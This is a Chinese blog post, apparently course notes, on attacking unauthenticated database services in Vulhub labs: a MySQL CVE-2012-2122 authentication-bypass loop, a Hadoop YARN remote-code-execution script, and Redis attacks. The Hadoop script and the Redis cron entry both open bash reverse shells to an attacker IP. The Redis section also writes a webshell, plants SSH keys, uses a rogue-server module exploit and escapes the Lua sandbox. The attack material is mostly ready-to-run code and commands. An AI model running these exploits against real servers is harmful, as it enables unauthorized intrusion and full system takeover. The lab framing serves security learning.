第55天:服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE

已于 2024-04-08 21:01:39 修改
阅读量982 收藏 22
点赞数 27
文章标签: web安全 安全
于 2024-04-08 20:59:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/137492278
版权

目录

思维导图:

常见服务的安全测试:

服务安全流程:

案例一:Mysql-未授权访问-CVE-2012-2122 利用

案例二: Hadoop-未授权访问-内置配合命令执行 RCE

案例三:Redis-未授权访问-Webshell&任务&密匙&RCE 等

写入webshell

 写入计划任务反弹shell

ssh密钥链接

​编辑利用自动化脚本去getshell

redis沙盒绕过命令执行

思维导图:

常见服务的安全测试:

1.配置不当-未授权访问

2.安全机制-特定安全漏洞

3.安全机制-弱口令爆破攻击

服务安全流程:

端口扫描 nmap netstat

服务开放了,但是端口不存在?

1.内网环境,端口映射

2.端口被修改

3.防护软件-防火墙等

如果没有端口,利用组合猜测,例如:php-mysql

判断服务类型:

远程控制:  win 3389 rdp  linux 22 ssh   --> 账号密码爆破

案例一:Mysql-未授权访问-CVE-2012-2122 利用

靶场环境:Vulhub - Docker-Compose file for vulnerability environment

创建docker环境

查看ip

利用命令

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

 复现:失败很多次后会成功

另外mysql不能够使用远程暴力破解。因为root用户只能本地登录,可以采取利用phpmyadmin去远程登录利用,爆破密码。

案例二: Hadoop-未授权访问-内置配合命令执行 RCE

靶场环境:Vulhub - Docker-Compose file for vulnerability environment

搭建

访问:http://your-ip:8088

访问你的ip地址/cluster/apps,如果存在证明有漏洞

kali开启监听

新开的窗口执行下方代码,去反弹shell

import requests
 
def shell(url,vps_ip,port):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
    }
    response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
    id = response.json()["application-id"]
    data = {
        'application-id': id,
        'application-name': 'getshell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
            },
        },
        'application-type': 'YARN'}
    exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
    print("[+] 执行完成!")
 
 
if __name__ == '__main__':
    url = input("目标的URL:")
    vps_ip = input("监听的主机IP地址(kali):")
    port = input("监听的主机端口(kali):")
    shell(url,vps_ip,port)

运行,成功反弹sell

案例三:Redis-未授权访问-Webshell&任务&密匙&RCE 等

redis端口: 6379

未授权访问条件:

1.redis.conf中 bind表示允许谁访问,被注释了表示都可以访问

2.redis.conf 中 下面这个模块默认是关闭的

3.默认没设置密码 requirepass

环境配置:(centos7)

1、下载
wget http://download.redis.io/releases/redis-2.8.17.tar.gz

2、解压编译
tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译

3、配置及启动
cd src/ #进入src目录 
cp redis-server /usr/bin/ 
cp redis-cli /usr/bin/      #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd ..   # 返回上一级目录
cp redis.conf /etc/     #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf  # 使用/etc/目录下的redis.conf文件中的配置启动redis服务

启动后的效果

利用redis桌面连接工具进行连接

连接后。ctrl+t进入命令终端

写入webshell

需要知道写入路径 /tmp目录默认是所有人都可以写入

利用条件:Web 目录权限可读写
config set dir /tmp #设置 WEB 写入目录
config set dbfilename 1.php #设置写入文件名
set test "<?php phpinfo();?>" #设置写入文件代码
bgsave #保存执行
save #保存执行
注意:部分没目录权限读写权限

 执行:

查看centos7是否写入

 写入计划任务反弹shell

kali首先开启监听

首先centos中的计时任务,可以写在/var/spool/cron中

set xx "\n* * * * * bash -i >& /dev/tcp/192.168.172.132/7777 0>&1\n"
//星号表示的是计划任务的时间
config set dir /var/spool/cron/   //或者 /var/spool/cron/crontabs 
config set dbfilename root     // 计划任务的文件名为root
save   // ok
config get dir
//即可查看保存路径 ,确保路径无误

kali成功反弹shell

如果无法反弹shell可能是由于上一个实验的结果。也会输入这个文件当中造成影响,可以新开一个kali窗口,进行纯净版的输入,如图

ssh密钥链接

利用该攻击方式,还需要允许密钥对登录,并且redis以root登录

首先生成密钥对

进入root目录下

把公钥复制到key.txt文件当中

传输公钥

自己搭建的服务器,如果没有.ssh需要手工生成一下

连接保存公钥

利用自己的私钥去主动连接

利用自动化脚本去getshell

下载地址:https://github.com/vulhub/redis-rogue-getshell

可以用的redis版本: Redis4.x/5.0.5

运行代码:

python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"

搭建靶场:Vulhub - Docker-Compose file for vulnerability environment

利用,首先需要编译

利用

换一个命令

redis沙盒绕过命令执行

靶场环境:Vulhub - Docker-Compose file for vulnerability environment

搭建:

利用代码:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

复现

xiaojiesec
关注
  • 27
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
第61:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
#数据库应用提权在权限提升中的意义#WEB 或本地环境如何探针数据库应用#数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等演示案例:Redis
webSocKetCanvasBarrage:利用WebSocKet&&Canvas&&Redis实现的弹幕功能
05-01
弹幕效果 canvas+video+websocket+redis
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&授权访问&RCE-漏洞复现
ran的博客
05-05 3021
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
数据库服务安全--Mysql授权--Hadoop授权配合RCE--Redis授权&RCE
weixin_68243135的博客
11-21 2169
数据库安全漏洞--MySQL--Hadoop--Redis
小迪安全55 服务攻防-数据库安全&Redis&Hadoop&Mysql&授权访问&RCE
Morrowindzzw的博客
12-14 1076
set yy"\n\n\n* * * * *bash -i>& /dev/tcp/反弹ip地址/5555 0>&1\n\n\n" //设置启动命令。use auxiliary/scanner/mysql/mysql_authbypass_hashdump //选择该模块。config set dir /var #设置 WEB 写入目录在/var。config set dir /var/spool/cron //设置启动目录。set threads 10 //设置线程。
day55 数据库安全&Redis&Hadoop&Mysql&授权访问&RCE
wanjia01的博客
01-28 400
知识点:1、服务攻防-数据库类型安全2、Redis&Hadoop&Mysql安全3、Mysql-CVE-2012-2122漏洞4、Hadoop-配置不当授权三重奏&RCE漏洞3、Redis-配置不当授权三重奏&RCE两漏洞#章节内容:常见服务应用的安全测试:1、配置不当-授权访问2、安全机制-特定安全漏洞3、安全机制-弱口令爆破攻击#前置知识:应用服务安全测试流程:见图1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属-数据库&文件传输&通讯等。
【小迪安全2023】第54:WEB攻防-通用漏洞&跨域CORS资源&JSONP回调&域名接管劫持;第55:服务攻防-数据库安全&Redis&Hadoop&Mysql&授权访问&RCE
人若无名,便可专心练剑
04-23 1066
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出XMLHttpRequest请求,从而克服了AJAX只能同源使用的限制,以使不同的网站可以跨域获取数据。环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。1、子域名接管-检测&探针&利用。
网络安全全栈培训笔记(55-服务攻防-数据库安全&Redis&Hadoop&Mysqla&授权访问&RCE
qq_46343633的博客
01-19 1268
1、服务攻防数据库类型安全2、Redis&Hadoop&Mysql安全3、Mysql-CVE-2012-2122漏洞4、Hadoop-配置不当授权三重奏&RCE漏洞3、Redis-配置不当授权三重奏&RCE两漏洞#章节内容:常见服务应用的安全测试:1、配置不当-授权访问2、安全机制特定安全漏洞3、安全机制弱口令爆破攻击#前置知识:应用服务安全测试流程:见图1、判断服务开放情况-端口扫描&组合应用等2、判断服务类型归属数据库&文件传翰&通讯等。
10.Linux-centos7安装jdk&mysql&redis
08-24
centos7安装mysql 5、centos7安装jdk、redis
gossip-girl:实时同步服务器,使用 Akka & Redis
06-30
活化剂-akka-scala-seed 使用 Scala 构建的 Akka 的最小种子模板
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 606
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
红蓝对抗 网络安全 网络安全红蓝对抗演练
2401_84488537的博客
05-15 1067
在军事领域,演习是专指军队进行大规模的实兵演习,演习中通常分为红军、蓝军,演习多以红军守、蓝军进攻为主。类似于军事领域的红蓝军对抗,网络安全中,红蓝军对抗则是一方扮演黑客(蓝军),一方扮演防御者(红军)。在国外的话,进行渗透攻击的团队经常称做红队,在国内称为蓝队实际上应该是比较准确的叫法。红蓝对抗一定要区别于渗透测试,渗透测试这是每个公司的标配。红蓝对抗的价值在于挖掘渗透测试不关注的漏洞或者渗透测试无法覆盖的点,并且持续的对抗,不断帮助业务提升安全能力,完善自己的安全防御。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 930
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
CTF如何学习?
小司机的奥拓
05-14 927
作和项目会带来影响,毕竟你不可能打一辈子的CTF,而CTF和实战还是有区别,过度沉浸于CTF的模式当中会让你在实战中却无从下手**
网络安全快速入门(十三)linux及vmware软件的网络配置
最新发布
ch225的博客
05-15 882
在通过我们前面的了解,我们现在已经对Linux的基础知识有了大致的了解,今我们来大概讲一下关于linux系统及vmware的网络配置问题,在这之前,我们需要对网络有一个大概的认识和了解,话不多说,我们开始进入今的正题吧!
网络安全(黑客技术)—2024自学手册
dexi113的博客
05-10 1953
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!
给这段配置文件添加注释services: ruoyi-redis: container_name: ruoyi-redis image: redis build: context: ./redis ports: - "9063:6379" volumes: - ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf - ./redis/data:/data command: redis-server /home/ruoyi/redis/redis.conf
06-09
以下是带注释的配置文件: ``` services: # Redis服务 ruoyi-redis: # 容器名称 container_name: ruoyi-redis image: redis # Redis镜像 build: # 构建Redis镜像 context: ./redis # Dockerfile所在目录 ports: - "9063:6379" # 容器与主机端口映射 volumes: - ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf # Redis配置文件映射 - ./redis/data:/data # Redis数据目录映射 command: redis-server /home/ruoyi/redis/redis.conf # 启动Redis服务的命令 ``` 注释解释如下: - Redis服务:这是一个Redis服务容器。 - 容器名称:指定容器的名称为ruoyi-redis。 - Redis镜像:使用Redis官方镜像。 - 构建Redis镜像:使用./redis目录下的Dockerfile构建Redis镜像。 - 容器与主机端口映射:将容器内部的6379端口映射到主机的9063端口。 - Redis配置文件映射:将主机中的./redis/conf/redis.conf文件映射到容器中的/home/ruoyi/redis/redis.conf文件。 - Redis数据目录映射:将主机中的./redis/data目录映射到容器中的/data目录。 - 启动Redis服务的命令:在容器启动时执行redis-server /home/ruoyi/redis/redis.conf命令来启动Redis服务

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值